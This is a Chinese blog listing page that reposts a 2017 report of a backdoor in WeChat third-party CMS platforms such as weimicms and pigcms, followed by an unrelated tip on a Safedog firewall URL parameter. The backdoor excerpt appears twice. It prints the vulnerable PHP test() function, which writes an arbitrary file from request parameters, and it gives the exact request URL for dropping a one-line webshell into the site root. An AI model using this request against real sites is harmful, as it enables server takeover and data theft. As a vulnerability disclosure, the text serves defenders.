网曝微信第三方平台出现惊人后门及漏洞 微米 weimicms pigcms 等
[ 2017-10-21 10:09:32 | 作者: admin ]
来源:http://blog.360dseo.com/
网曝微信第三方平台出现惊人后门及漏洞,后门及漏洞轻则导致网站无法访问,内容被篡改,严重的可能盗取服务器资料。
更严重的可能会获取服务器直接管理权限,因为代码属于正常参数提交,所以不会被杀毒软件及各种防火墙拦截,完全免疫!!!
后门1:
执行原理网址后加index.php?g=Home&m=Weixin&a=test&name=muma.php&data=木马内容,
直接打开浏览就可以。笨蛋的说就是粘贴进网址按回车。
这里就是提交一句话木马写入到根目录muma.php内 由于很多程序做了转码,但是还是很多可以执行的。
...
阅读全文…
网曝微信第三方平台出现惊人后门及漏洞,后门及漏洞轻则导致网站无法访问,内容被篡改,严重的可能盗取服务器资料。
更严重的可能会获取服务器直接管理权限,因为代码属于正常参数提交,所以不会被杀毒软件及各种防火墙拦截,完全免疫!!!
后门1:
WeixinAction.class.php
public function test($name, $data)
{
file_put_contents($name, $data);
}
这句话的意思就是在根目录生成文件data可以一句话木马提交注入。public function test($name, $data)
{
file_put_contents($name, $data);
}
执行原理网址后加index.php?g=Home&m=Weixin&a=test&name=muma.php&data=木马内容,
直接打开浏览就可以。笨蛋的说就是粘贴进网址按回车。
这里就是提交一句话木马写入到根目录muma.php内 由于很多程序做了转码,但是还是很多可以执行的。
...
阅读全文…
安装安全狗之后,网址自动加了WebShieldSessionVerify=怎么处理
[ 2017-10-20 16:02:02 | 作者: admin ]
出现该字符的主要原因是开启了网站安全狗的CC防护的会话验证模式的中级模式或高级模式,所以IE浏览器会跟上这段代码进行网站访问的验证.浏览器首次访问验证通过后,后续访问不会出现该字符.
如果确实不想出现这段验证代码可以将网站安全狗的CC攻击防护功能的会话验证模式调整为初级模式(该模式对攻击验证判断较为宽松)即可解决.
如果确实不想出现这段验证代码可以将网站安全狗的CC攻击防护功能的会话验证模式调整为初级模式(该模式对攻击验证判断较为宽松)即可解决.
1
